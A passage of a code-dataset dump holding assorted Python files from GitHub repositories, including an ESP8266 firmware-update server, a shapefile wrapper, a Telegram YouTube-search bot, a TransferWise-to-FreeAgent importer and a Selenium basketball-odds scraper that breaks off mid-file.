os\nimport sys\n\n# HTTPRequestHandler class\nclass RequestHandler(BaseHTTPRequestHandler):\n\n # GET\n def do_GET(self):\n parsed_path = parse.urlparse(self.path)\n print(parsed_path, self.path)\n\n m = hashlib.md5()\n try:\n with open('/tmp/{}{}'.format(build_dir, parsed_path.path), 'rb') as f:\n firmware = f.read()\n\n m.update(firmware);\n print('local firmware: ' + m.hexdigest())\n except:\n print(\"\"\"Can't load local firmware\"\"\")\n return\n\n\n for name, value in self.headers.items():\n #print(name, value)\n if name[:10] == 'x-ESP8266-':\n print(name[10:], '->', value)\n\n if self.headers.get('x-ESP8266-version') == m.hexdigest():\n self.send_response(304)\n return\n\n # Send response status code\n self.send_response(200)\n\n # Send headers\n self.send_header('Content-type','application/octet-stream')\n self.send_header('Content-Disposition','attachment; filename=firmware.ino')\n self.send_header('Content-Length', len(firmware))\n self.end_headers()\n\n self.wfile.write(firmware)\n return\n\nbuild_dir = \"\"\nfor d in os.listdir('/tmp'):\n if d[:14] == 'arduino_build_' and d > build_dir:\n build_dir = d\n\nif len(build_dir) == 0:\n print(\"\"\"Can't find Arduino Build Directory\"\"\")\n sys.exit(1)\n\nserver_address = ('0.0.0.0', 8888)\nhttpd = HTTPServer(server_address, RequestHandler)\nprint('running server...')\nhttpd.serve_forever()\n","repo_name":"guillier/Teleinfo_MQTT","sub_path":"ESP_OTA.py","file_name":"ESP_OTA.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"14302996581","text":"from Prey import Prey\nfrom Hunter import Hunter\nfrom Grid import Grid\nfrom random import randint\nfrom time import sleep\nimport os\n\ndef PreyExists(grid: Grid, prey: str):\n found = False\n \n for x, matrixI in enumerate(grid.matrix):\n for y, value in enumerate(matrixI):\n if value == prey:\n found = True\n\n return(found)\n\ndef printGrid(grid: Grid):\n os.system('cls')\n grid.printMatrix()\n\nif __name__ == \"__main__\":\n numberOfPreys = randint(5, 9)\n grid = Grid(7)\n \n hunter = Hunter(randint(0, grid.size - 1), randint(0, grid.size - 1))\n grid.insertElementInMatrix(hunter.x, hunter.y, hunter.element)\n listOfPreys = []\n for i in range(numberOfPreys):\n listOfPreys.append(\n Prey(randint(0, grid.size - 1), randint(0, grid.size - 1), str(i))\n )\n prey = listOfPreys[-1]\n grid.insertElementInMatrix(prey.x, prey.y, prey.preyID)\n \n printGrid(grid)\n sleep(1)\n\n while(len(listOfPreys) > 0):\n i+= 1\n for prey in listOfPreys:\n prey.move(grid)\n \n hunter.move(grid)\n \n for prey in listOfPreys:\n if not PreyExists(grid, prey.preyID):\n listOfPreys.remove(prey)\n \n printGrid(grid)\n sleep(1)\n","repo_name":"TheBestShadow/HunterPrey_AI","sub_path":"HunterAndPrey/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74806479400","text":"\"\"\"\n\nДомашнее задание №1\n\nУсловный оператор: Возраст\n\n* Попросить пользователя ввести возраст при помощи input и положить \n результат в переменную\n* Написать функцию, которая по возрасту определит, чем должен заниматься пользователь: \n учиться в детском саду, школе, ВУЗе или работать\n* Вызвать функцию, передав ей возраст пользователя и положить результат \n работы функции в переменную\n* Вывести содержимое переменной на экран\n\n\"\"\"\n\n\n\ndef main():\n\n while True:\n try:\n age = float(input('Введите свой возраст: '))\n break\n except ValueError:\n print(\"\\nВведите нормальный возраст!\\n\")\n\n \n if 3 <= age <= 6:\n \treturn \"Ваше место в детском саду\"\n elif 7 <= age <= 17:\n \treturn \"Ваше место в школе\"\n elif 18 <= age <= 22:\n \treturn \"Ваше место в ВУЗе\"\n elif 23 <= age <= 65:\n \treturn \"Ваше место на работе\"\n elif age == 0:\n return 'С ДР!'\n elif age < 0:\n return 'Не бывает отрицательного возраста'\n else:\n \treturn \"Вы слишком малы, либо пора на пенсию\"\n\nif __name__ == \"__main__\":\n my_age = main()\n print(my_age)","repo_name":"Abiotic/lesson2","sub_path":"1_if1.py","file_name":"1_if1.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18917659373","text":"from builtins import range\ntry:\n # Depending of the build options, this might be missing. Just skip \n # ShapeFile if we don't have this.\n # This has a deprecation warning for python 3.7 and GDAL 2.4.2. We can't do\n # anything about this, so silence the warning\n import warnings\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\",category=DeprecationWarning)\n import osgeo.ogr as ogr\n import osgeo.osr as osr\n have_shape_file = True\nexcept ImportError:\n have_shape_file = False\n\nimport os.path\nimport collections\nimport collections.abc\nimport weakref\n\nif(have_shape_file):\n class ShapeFile(collections.abc.Mapping):\n '''library OGR. You can see supported formats at \n http://gdal.org/ogr/ogr_formats.html. This only supports a subset of the\n available functions, but it gives a simpler interface. You can also just\n directly use data_source and layers[\"blah\"].layer which are \n ogr.DataSource and ogr.Layer'''\n\n # Need to add support for using as a \"with\" file\n def __init__(self, fname, mode = \"r\", driver_name = \"ESRI Shapefile\"):\n '''Open the given file, with the given mode. If you are writing, \n you can supply the driver name to use.'''\n # Shape files don't like being overwritten, so we remove\n ext = os.path.splitext(fname)\n if(mode == \"w\" and driver_name == \"ESRI Shapefile\" and\n ext == \".shp\" and os.path.exists(fname)):\n os.remove(fname)\n self.layers = {}\n if(mode == \"r\"):\n self.data_source = ogr.Open(fname)\n if(self.data_source is None):\n raise RuntimeError(\"Error opening file %s\" % fname)\n for i in range(self.data_source.GetLayerCount()):\n lay = ShapeLayer(self, i)\n self.layers[lay.name] = lay\n elif(mode ==\"w\"):\n self.data_source = ogr.GetDriverByName(driver_name).CreateDataSource(fname)\n else:\n raise RuntimeError(\"Invalid mode %s\" % mode)\n\n @property\n def file_name(self):\n return self.data_source.GetName()\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.close()\n\n def __len__(self):\n return self.layers.__len__()\n\n def __iter__(self):\n return self.layers.__iter__()\n\n def __getitem__(self, key):\n return self.layers.__getitem__(key)\n\n def close(self):\n '''Close the file and write everything to disk'''\n if(self.data_source is not None):\n self.data_source.SyncToDisk()\n self.data_source = None\n\n def __del__(self):\n self.close()\n\n def add_layer(self, name, geometry_type, fields, spatial_reference = osr.SpatialReference(osr.GetUserInputAsWKT(\"WGS84\"))):\n '''Add a layer of the given geometry type with the given fields.\n\n For example:\n t.add_layer(\"out\", ogr.wkbPolygon,\n [[\"File\", ogr.OFTString, 100],\n [\"Row\", ogr.OFTInteger],])\n\n Each field has a name, type, optionally a width, and optionally a\n precision.\n\n You can specify the spatial reference, but the default is WGS84'''\n data_layer = self.data_source.CreateLayer(name, spatial_reference,\n geometry_type)\n for v in fields:\n f = ogr.FieldDefn(v[0], v[1])\n if(len(v) >= 3):\n f.SetWidth(v[2])\n if(len(v) >= 4):\n f.SetPrecision(v[3])\n data_layer.CreateField(f)\n lay= ShapeLayer(self, self.data_source.GetLayerCount() - 1)\n self.layers[lay.name] = lay\n return lay\n\n class ShapeLayer(collections.abc.Sequence):\n '''This class handles access to a single layers in a Shapefile.'''\n def __init__(self, shape_file, index):\n '''Create ShapeLayer for given ShapeFile and index. This isn't \n normally called directly, instead go through ShapeFile'''\n self.shape_file = weakref.proxy(shape_file)\n self.layer = self.shape_file.data_source.GetLayer(index)\n self.field_list = [self.layer.GetLayerDefn().GetFieldDefn(i).GetName() for i in range(self.layer.GetLayerDefn().GetFieldCount())]\n\n @property\n def name(self):\n return self.layer.GetName()\n\n @staticmethod\n def linear_ring_2d(v):\n '''Create a linear ring using 2d points. We pass in an array,\n with each entry in the array being an array of 2 values.'''\n g = ogr.Geometry(ogr.wkbLinearRing)\n for i in v:\n g.AddPoint_2D(*i)\n return g\n\n @staticmethod\n def polygon_2d(*v):\n '''Create a polygon using 2D points. A polygon has one exterior\n ring and zero or more interior rings. This gets passed as one or\n more arrays, with each array having arrays of 2 values.\n \n We close any rings passed in, so you don't have to give the closing\n point if you don't want to (although it doesn't hurt to do so).'''\n g = ogr.Geometry(ogr.wkbPolygon)\n for vf in v:\n gf = ShapeLayer.linear_ring_2d(vf)\n gf.CloseRings()\n g.AddGeometry(gf)\n return g\n\n @staticmethod\n def point_2d(x, y):\n '''Create a 2D point'''\n g = ogr.Geometry(ogr.wkbPoint)\n g.AddPoint_2D(x, y)\n return g\n\n def add_feature(self, d):\n '''Add a feature. We pass in a dictionary of keyword/value pairs. The \n keyword \"Geometry\" is used to set the geometry. You can optionally\n include a \"Style\" to pass in a style string.\n\n As a convenience, this returns this object, so you can add multiple \n features in a row'''\n f = ogr.Feature(self.layer.GetLayerDefn())\n for name, value in list(d.items()):\n if(name ==\"Geometry\"):\n f.SetGeometry(value)\n elif(name ==\"Style\"):\n f.SetStyleString(value)\n else:\n f.SetField(name, value)\n self.layer.CreateFeature(f)\n return self\n \n\n def set_filter_rect(self, x1, y1, x2, y2):\n '''Filter the features so only those that intersect the rectangle\n are returned. The x and y are given in whatever the spatial\n reference is for the layer, e.g., longitude and latitude\n (note the order, X is longitude)'''\n self.layer.SetSpatialFilterRect(x1, y1, x2, y2)\n\n def set_spatial_filter(self, ogr_geometry):\n '''Filter the features based on a spatial filter. The spatial filter \n should be an Ogr::Geometry, and we filter based on intersecting \n that geometry. Note that the special case of a rectangle filter is\n handled by set_filter_rect, which has an easier interface (although\n there is nothing wrong with creating a rectangle as an Ogr::Geometry\n and calling this function if desired.\n \n Note that you can additionally filter by attributes using \n set_attribute_filter.'''\n self.layer.SetSpatialFilter(ogr_geometry)\n\n def set_attribute_filter(self, where_clause):\n '''Filter the features based on an SQL where clause on the attributes.\n Note that this is in addition to any spatial filters, you can have\n both a spatial and an attribute filter at the same time.'''\n self.layer.SetAttributeFilter(where_clause)\n\n def clear_filter(self):\n '''Clear whatever filters have been set.'''\n self.layer.SetSpatialFilter(None)\n self.layer.SetAttributeFilter(None)\n\n def geometry_collection(self):\n '''Return the geometry union of all the features. This is useful for \n example if this layer is POI list and we are finding the intersection\n with a footprint layer.'''\n gcol = ogr.Geometry(ogr.wkbGeometryCollection)\n for ft in self:\n gcol.AddGeometry(ft[\"Geometry\"])\n return gcol\n\n def __getitem__(self, index):\n if(index < 0 or index >= len(self)):\n raise IndexError\n self.layer.SetNextByIndex(index)\n return ShapeFeature(self, self.layer.GetNextFeature())\n\n def __len__(self):\n return self.layer.GetFeatureCount()\n \n\nclass ShapeFeature(collections.abc.Mapping):\n '''This handles a Feature in a Layer.'''\n def __init__(self, shape_layer, ogr_feature):\n self.layer = weakref.proxy(shape_layer)\n self.feature = ogr_feature\n\n def keys(self):\n res = [\"Geometry\"]\n res.extend(self.layer.field_list)\n return res\n\n def __iter__(self):\n for k in list(self.keys()):\n yield k\n return\n\n def __len__(self, key):\n return 1 + len(self.layer.field_list)\n\n def __getitem__(self, key):\n if(key == \"Geometry\"):\n return self.feature.GetGeometryRef()\n else:\n ind = self.feature.GetFieldIndex(key)\n if(ind < 0):\n raise KeyError(key)\n return self.feature.GetField(ind)\n\nif(have_shape_file):\n __all__ = [\"ShapeFile\", \"ShapeLayer\", \"ShapeFeature\", \"have_shape_file\"]\nelse:\n __all__ = [\"have_shape_file\"]\n","repo_name":"Cartography-jpl/geocal","sub_path":"python/lib/shape_file.py","file_name":"shape_file.py","file_ext":"py","file_size_in_byte":9143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5243770769","text":"from datetime import datetime\nimport logging\nimport time\nimport traceback\n\nfrom django.core.management.base import BaseCommand\nfrom channelguide.channels.models import Channel\nfrom channelguide.channels.management import utils\n\nclass Command(BaseCommand):\n\n def handle(self, **kwargs):\n \"\"\"Update the items for each channel.\"\"\"\n utils.set_short_socket_timeout()\n now = datetime.now()\n def callback(channel):\n if channel.state == Channel.SUSPENDED and now.weekday() != 6:\n # only check suspended feeds on Sunday\n return\n if not channel.is_approved() and \\\n channel.state != Channel.SUSPENDED:\n # only check approved/suspended feeds\n return\n if channel.id % 24 != now.hour:\n # check channels throughout the day, some each hour\n return\n try:\n start = time.time()\n channel.update_items()\n length = time.time() - start\n if length > 6:\n logging.warn(\"Update too slow for %s: %f\" % (channel.url,\n length))\n except:\n logging.warn(\"\\nError updating items for %s\\n\\n%s\\n\" %\n (channel, traceback.format_exc()))\n utils.spawn_threads_for_channels('updating items', callback, 4)\n","repo_name":"kmshi/miroguide","sub_path":"channelguide/channels/management/commands/update_items.py","file_name":"update_items.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"27343783193","text":"# the logging things\nimport logging\n\nfrom pyrogram import Client as app\nfrom pyrogram.types import Message\nfrom youtube_search import YoutubeSearch\n\nlogging.basicConfig(\n level=logging.DEBUG, format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n)\nlogger = logging.getLogger(__name__)\n\nimport pyrogram\n\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\n\n\n@app.on_message(pyrogram.filters.command([\"بحث\"]))\nasync def ytsearch(_, message: Message):\n try:\n if len(message.command) < 2:\n await message.reply_text(\"**•♪╎عـءراً .. يجب عليك كتابـة نص البحث بعد الامـر ...** !\")\n return\n query = message.text.split(None, 1)[1]\n m = await message.reply_text(\"**•♪╎ جـاري .. البحـث ðŸ�° : **\")\n results = YoutubeSearch(query, max_results=4).to_dict()\n i = 0\n text = \"\"\n while i < 4:\n text += f\"Title - {results[i]['title']}\\n\"\n text += f\"Duration - {results[i]['duration']}\\n\"\n text += f\"Views - {results[i]['views']}\\n\"\n text += f\"Channel - {results[i]['channel']}\\n\"\n text += f\"https://youtube.com{results[i]['url_suffix']}\\n\\n\"\n i += 1\n await m.edit(text, disable_web_page_preview=True)\n except Exception as e:\n await message.reply_text(str(e))\n","repo_name":"Mgffgf/zed","sub_path":"ZedMusic/modules/ytsearch.py","file_name":"ytsearch.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31765578201","text":"from modules.model.SBSongPart import SBSongPart\nfrom modules.model.SBCommonTypes import convertSBPartTypeToString\nfrom modules.view.SBViewElement import SBViewElement\nfrom modules.view.SBViewChord import SBViewChord\nfrom modules.controller.SBCtrlNewPartDialog import SBCtrlNewPartDialog\nfrom modules.view.SBViewPlayButton import SBViewPlayButton\nimport tkinter as tk\n\nclass SBViewSongPart(SBViewElement):\n def __init__(self, master, canvas, songpart, row=0):\n SBViewElement.__init__(self,100,50+row*130, 600, 120)\n self.master = master\n self.songpart = songpart\n self.canvas = canvas\n #self.width = 600\n #self.height = 120\n self.row = row\n self.rect = self.canvas.create_rectangle(self.x, self.y, self.x + self.width, self.y + self.height, fill=\"#EEEEEE\")\n self.canvas.create_text(self.x+self.width/2, self.y + 10, text=self.songpart.getName())\n self.canvas.create_text(self.x+self.width/2, self.y + 30, text=\"[\" + convertSBPartTypeToString(self.songpart.getPartType()) + \"]\")\n self.canvas.create_text(self.x+10, self.y+10, text=\"cycles: \"+str(self.songpart.getNrRepeats()), anchor=tk.W, fill=\"dark grey\")\n self.view_chords = []\n self.am_i_selected = False\n self.selected_viewchord = None\n self.view_textlines = []\n self.view_textline_elements = []\n\n\n self.but_play = SBViewPlayButton(self.master, self.canvas, self)\n\n x_offset = 0\n self.col = 0\n cnt = 0\n chord_row = 0\n\n textline_elements = []\n for tls in self.songpart.getTextlines():\n if (not(tls == None)):\n splt = self.splitUpTextline(tls)\n print(splt)\n for te in splt:\n textline_elements.append(te)\n\n #tl = self.splitUpTextline(self.songpart.getTextlines())\n for e in songpart.getChords():\n nc = SBViewChord(self.master, self.canvas, e, self, chord_row, self.col)\n\n if (cnt < len(textline_elements)):\n self.createTextLineElement(textline_elements[cnt+1], nc)\n\n self.view_chords.append(nc)\n me_coords = self.canvas.coords(self.rect)\n if (nc.getXMax() > me_coords[2]):\n chord_row = chord_row + 1\n nc.setRow(chord_row)\n self.col = 0\n nc.setCol(self.col)\n\n\n #col = col + e.getLengthInBars() + 1\n cnt = cnt + 1\n self.col = self.col + e.getLengthInBars()\n\n self.canvas.tag_bind(self.rect, '', self.say_hu)\n self.canvas.tag_bind(self.rect, '', self.iAmSelected)\n\n self.createViewTextlines()\n\n def getSongpart(self):\n return self.songpart\n\n def createViewTextlines(self):\n self.view_textlines = []\n txt_row = 0\n for e in self.songpart.getTextlines():\n tl = self.canvas.create_text(self.x + 10, self.y + 130 + 20*txt_row, text=e,\n anchor=tk.W, fill=\"dark grey\")\n self.view_textlines.append(tl)\n txt_row = txt_row + 1\n\n def createTextLineElement(self, textline_el, viewchord):\n vtl = self.canvas.create_text(viewchord.x + 10, viewchord.y + 30, text=self.removeCR(textline_el),\n anchor=tk.W, fill=\"dark grey\")\n self.view_textline_elements.append(vtl)\n\n def splitUpTextline(self,tl):\n t = \"\"\n t = tl.split(\"%\")\n return t\n\n def removeCR(self, text):\n return text.strip(\"\\n\")\n\n def createViewContent(self):\n self.view_textlines = []\n txt_row = 0\n chord_row = 0\n for e in self.songpart.getTextlines():\n num_chords = e.count(\"%\")\n for i in range(num_chords):\n chrds = self.songpart.getChords()\n e = chrds[i]\n nc = SBViewChord(self.master, self.canvas, e, self, chord_row, self.col)\n self.view_chords.append(nc)\n self.canvas.create_text(self.x + 10, self.y + 110 + 20 * txt_row, text=e,\n anchor=tk.W, fill=\"dark grey\")\n self.view_textlines.append(e)\n txt_row = txt_row + 1\n chord_row = chord_row + 1\n self.col = 0\n\n def update(self):\n self.col = 0\n outcolor = \"black\"\n if (self.am_i_selected == True):\n outcolor = \"red\"\n else:\n outcolor = \"black\"\n self.canvas.itemconfig(self.rect, outline=outcolor)\n\n chord_row = 0\n for e in self.view_chords:\n me_coords = self.canvas.coords(self.rect)\n if (e.getXMax() > me_coords[2]):\n chord_row = chord_row + 1\n e.setRow(chord_row)\n self.col = 0\n e.setCol(self.col)\n\n self.col = self.col + e.getChord().getLengthInBars()\n\n\n self.createViewTextlines()\n\n def addChord(self, chord):\n self.songpart.addChord(chord)\n nc = SBViewChord(self.master, self.canvas, chord, self, 0, self.col)\n self.view_chords.append(nc)\n\n\n def say_hu(self, event):\n\n print(\"Edit Songpart\")\n\n d = SBCtrlNewPartDialog(self.master, self.songpart, self)\n\n self.master.wait_window(d.top)\n self.update()\n print(\"repeats = \" + str(self.songpart.getNrRepeats()))\n\n def select(self, trueorfalse):\n self.am_i_selected = trueorfalse\n if (trueorfalse == False):\n if (not (self.selected_viewchord == None)):\n self.selected_viewchord.select(False)\n self.selected_viewchord.update()\n self.selected_viewchord = None\n self.update()\n\n def iAmSelected(self, event):\n if (not (self.selected_viewchord == None)):\n self.selected_viewchord.select(False)\n self.selected_viewchord = None\n\n self.master.reselectSongpart(self)\n\n def selectChord(self, viewchord):\n if (not (self.selected_viewchord == None)):\n self.selected_viewchord.select(False)\n self.selected_viewchord.update()\n self.selected_viewchord = viewchord\n self.selected_viewchord.select(True)\n self.update()\n self.selected_viewchord.update()\n if (self.am_i_selected == False):\n self.master.reselectSongpart(self)\n\n def deleteSelectedChord(self):\n if (self.selected_viewchord == None):\n print(\"can't delete chord, none selected!\")\n else:\n ind = self.view_chords.index(self.selected_viewchord)\n self.selected_viewchord.deleteGeometry()\n self.view_chords.pop(ind)\n self.selected_viewchord = None\n self.songpart.deleteChord(ind)\n self.update()\n\n\n\n\n\n\n","repo_name":"DrMarkusVoss/SongBoard","sub_path":"modules/view/SBViewSongPart.py","file_name":"SBViewSongPart.py","file_ext":"py","file_size_in_byte":6817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20187863854","text":"import logging\nimport sys\nimport csv\nimport os\nimport json\nfrom lxml.html import fromstring\nimport requests\nfrom itertools import cycle\nimport traceback\nimport re\n\n\n# module for obtaining a list of free proxy servers from free-proxy-list.net\ndef get_proxies() -> list:\n url = 'https://free-proxy-list.net/'\n response = requests.get(url)\n parser = fromstring(response.text)\n proxies = list()\n for i in parser.xpath('//tbody/tr')[:10]:\n if i.xpath('.//td[7][contains(text(),\"yes\")]'):\n proxy = \":\".join([i.xpath('.//td[1]/text()')[0], i.xpath('.//td[2]/text()')[0]])\n proxies.append(proxy)\n return proxies\n\n\n# simple module to manually set logging configuration\ndef set_logging() -> logging:\n stdout_handler = logging.StreamHandler(sys.stdout)\n handlers = [stdout_handler]\n\n logger = logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s:%(name)s: %(levelname)s : %(message)s',\n handlers=handlers\n )\n\n\n# CSV store util\ndef store_to_csv(data: dict, outfile: str, headers: list) -> None:\n with open(outfile, 'a', encoding=\"utf8\") as writeFile:\n headers = headers\n writer = csv.DictWriter(writeFile, delimiter=',', lineterminator='\\n', fieldnames=headers)\n if writeFile.tell() == 0:\n writer.writeheader()\n writer.writerow(data)\n\n\n# json config loader\ndef load_json_config(config_file: json) -> dict:\n try:\n json_file = f\"config_files/{config_file}.json\"\n with open(json_file) as f:\n loaded_config = json.load(f)\n print(f\"Loading config file {config_file}\")\n\n return loaded_config\n\n except Exception as e:\n print(f\"Error in loading config file. {e}\")\n\n\n# function for converting string number to int\ndef convert_str_to_number(x: str) -> list:\n try:\n extracted_str = re.findall(r'[\\d.,K,k,M,m]+', x, re.IGNORECASE)\n cleaned_str = [r.strip().replace(\",\", \"\") for r in extracted_str]\n total_stars = 0\n num_map = {'K': 1000, 'M': 1000000, 'B': 1000000000}\n converted = []\n if len(cleaned_str) > 1:\n for x in cleaned_str:\n if x.isdigit():\n converted.append(int(x))\n else:\n if len(x) > 1:\n total_stars = int(x[:-1]) * num_map.get(x[-1].upper(), 1)\n converted.append(total_stars)\n else:\n if ''.join(cleaned_str).isdigit():\n converted.append(int(''.join(cleaned_str)))\n else:\n if len(''.join(cleaned_str)) > 1:\n total_stars = int(''.join(cleaned_str)[:-1]) * num_map.get(''.join(cleaned_str)[-1].upper(), 1)\n converted.append(total_stars)\n\n return converted\n\n except ValueError as ve:\n\n return []\n","repo_name":"jczuniga/realestate_scraper","sub_path":"util/gen_util.py","file_name":"gen_util.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73415965479","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 16:21:00 2019\n\n@author: ark4d\n\"\"\"\n# comment blocks comments what below\n\nclass MainGrapher():\n def __init__(self, style):\n self.style = style\n \n def _create_line(self, ax):\n ax.axhline(1.0, linestyle='--', alpha=0.3, color='green')\n \n def _apply_style(self, ax):\n ax.grid = self.style['grid']['alpha']\n y_lim = self.style['y']['lim']\n ax.set_ylim(*y_lim)\n \n ax.set_yticks(self.style['y']['ticks'])\n ax.xaxis.set_tick_params(rotation=self.style['ticks_x']['rotation'])\n if self.style['spine']['remove']:\n for spine in ax.spines.items():\n spine[1].set_visible(False)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(self.style['ticks_x']['fontsize']) \nclass DateTimeGrapher(MainGrapher):\n '''\n Class for creating graph with datetime\n '''\n def __init__(self, style, locator, formatter):\n '''\n Inizialization\n Parameters\n ---------\n style : dict-type object\n see README for more details\n locator : matplotlib.dates.Locator\n What will be used as a locator in the plot\n formatter : matplotlib.dates.Formatter\n Object that will format date\n '''\n super().__init__(style)\n self.locator = locator\n self.formatter = formatter\n \n def create_graph(self, ax, data, color):\n '''\n Applies style and creates plot on given axis. \n \n Parameters\n ----------\n ax : matplotlib.axes\n axes on which the graph will be plotted\n data : pandas.DataFrame\n index - datetime\n values - values of interest\n color : str\n Hex of color or a standart mpl name (e.g. yellow, red, purple) \n '''\n ax.plot(data.index, data.values, color=color)\n self._apply_style(ax)\n self._create_line(ax)\n if self.locator:\n ax.xaxis.set_major_locator(self.locator)\n if self.formatter:\n ax.xaxis.set_major_formatter(self.formatter)\n return ax\n\nclass BasicGrapher(MainGrapher):\n def __init__(self, style):\n '''\n Inizialization\n Parameters\n ---------\n style : dict-type object\n see README for more details\n '''\n super().__init__(style)\n \n def create_graph(self, ax, data, color, line=True):\n '''\n Applies style and creates plot on given axis. \n \n Parameters\n ----------\n ax : matplotlib.axes\n axes on which the graph will be plotted\n data : pandas.DataFrame\n index - datetime\n values - values of interest\n color : str\n Hex of color or a standart mpl name (e.g. yellow, red, purple) \n line : bool\n If true shows line at 1.0\n '''\n ax.plot(data.index, data.values, color=color)\n self._apply_style(ax)\n if line:\n self._create_line(ax)\n return ax\n\nclass PieCharter():\n pass\n # TODO: implement pie charter","repo_name":"Arkady-A/TimeAnalyst","sub_path":"timeAnalyst/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6007515401","text":"import csv\nimport datetime\nfrom configparser import ConfigParser\nfrom io import StringIO\n\nfrom freeagent_transferwise_importer.freeagent import FreeAgent\nfrom freeagent_transferwise_importer.transferwise import BorderlessAccount\n\nconfig = ConfigParser()\nconfig.read(\"config.ini\")\n\ntransferwise = BorderlessAccount(**config[\"transferwise\"])\nfreeagent = FreeAgent(**config[\"freeagent\"])\n\naccount_id, currencies = transferwise.get_account_id_and_currencies()\nfor currency in currencies:\n bank_account_id, last_updated = freeagent.get_or_create_bank_account(currency)\n transactions = transferwise.get_transactions(account_id, currency, last_updated)\n statement_file = StringIO()\n statement_csv = csv.writer(statement_file)\n for transaction in transactions:\n statement_csv.writerow(\n [\n datetime.datetime.strptime(\n transaction[\"date\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"\n ).strftime(\"%d/%m/%Y\"),\n transaction[\"amount\"][\"value\"],\n transaction[\"details\"][\"description\"],\n ]\n )\n statement_csv.writerow(\n [\n datetime.datetime.strptime(\n transaction[\"date\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"\n ).strftime(\"%d/%m/%Y\"),\n transaction[\"totalFees\"][\"value\"],\n f'Fee for {transaction[\"details\"][\"description\"]}',\n ]\n )\n statement = statement_file.getvalue()\n if statement:\n freeagent.add_transactions(bank_account_id, statement)\n statement_file.close()\n","repo_name":"cnorthwood/freeagent-transferwise-importer","sub_path":"freeagent_transferwise_importer/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37819181097","text":"from selenium import webdriver\nimport time\nfrom LastGame import LastGame\nfrom Game import Game\nimport traceback\nfrom Constants import XPath\nimport ExecReq\nimport datetime\n\ndef parseLastCntWin(elems, isFirstTeam):\n countElem = 0\n listRes = list()\n while 5 > len(listRes) and countElem < len(elems):\n elems[countElem].click()\n driver.switch_to.window(driver.window_handles[2])\n print(\"----------------------------\")\n kf = ExecReq.getKF(driver)\n if kf == False or (kf[0] < 1.3 or kf[1] < 1.3):\n countElem += 1\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n continue\n scoreFirst = ExecReq.getElemByXPath(\"//*[@class='odd']\", driver)\n scoreSec = ExecReq.getElemByXPath(\"//*[@class='even']\", driver)\n timeStart = time.time()\n while len(scoreFirst.text.split()) < 6 or len(scoreSec.text.split()) < 6:\n if time.time() - timeStart > 5:\n break\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n elems[countElem].click()\n driver.switch_to.window(driver.window_handles[2])\n scoreFirst = ExecReq.getElemByXPath(\"//*[@class='odd']\", driver)\n scoreSec = ExecReq.getElemByXPath(\"//*[@class='even']\", driver)\n if (len(scoreFirst.text.split()) < 6 or len(scoreSec.text.split()) < 6):\n countElem += 1\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n continue\n lastGame = LastGame(\"\", [scoreFirst.text, scoreSec.text])\n print(\"----------------------------\")\n if lastGame.isCleanScore(isFirstTeam=isFirstTeam):\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n print(\"this game bad\")\n return False\n listRes.append(lastGame)\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n countElem += 1\n driver.switch_to.window(driver.window_handles[1])\n return listRes\n\ndef skip(i, driver, countSkip = 2):\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n return i + countSkip\n\ndef parseMaths(driver, XPathBtn, dropLigue):\n try:\n driver.get('https://www.myscore.ru/basketball/')\n ExecReq.clickGetElem(driver, XPathBtn)\n time.sleep(1)\n elemsLigue = driver.find_elements_by_xpath(\"//table[@class='basketball']\")\n j = 0\n lstGame = list()\n i = 0\n elems = ExecReq.getElemsByXPath(XPath.allGame, driver)\n while j < len(elemsLigue):\n ligueName = elemsLigue[j].text.split('\\n')[1]\n print(ligueName)\n countGame = elemsLigue[j].text[len(elemsLigue[j].text.split('\\n')[0] + \"\\n\" + ligueName):].count(':')\n print(countGame)\n startI = i\n while i < startI + (countGame) * 2 and i < len(elems):\n resCmd = elems[i].text + elems[i + 1].text\n elemBase = elems[i]\n resCmd = resCmd.translate({ord(c): None for c in '\\n'})\n if len(resCmd.split('(Ж)')) > 1:\n i += 2\n continue\n timeGame = resCmd.split()[0].split(\":\")\n timeGame = int(timeGame[0]) * 60 + int(timeGame[1])\n print(resCmd)\n try:\n dropLigue.index(ligueName)\n i += 2\n print('drop')\n continue\n except:\n pass\n ExecReq.clickElem(elems[i])\n driver.switch_to.window(driver.window_handles[1])\n\n kf = ExecReq.getKF(driver)\n if kf == False or (kf[0] < 1.3 or kf[1] < 1.3):\n i = skip(i, driver)\n continue\n elif kf[0] > 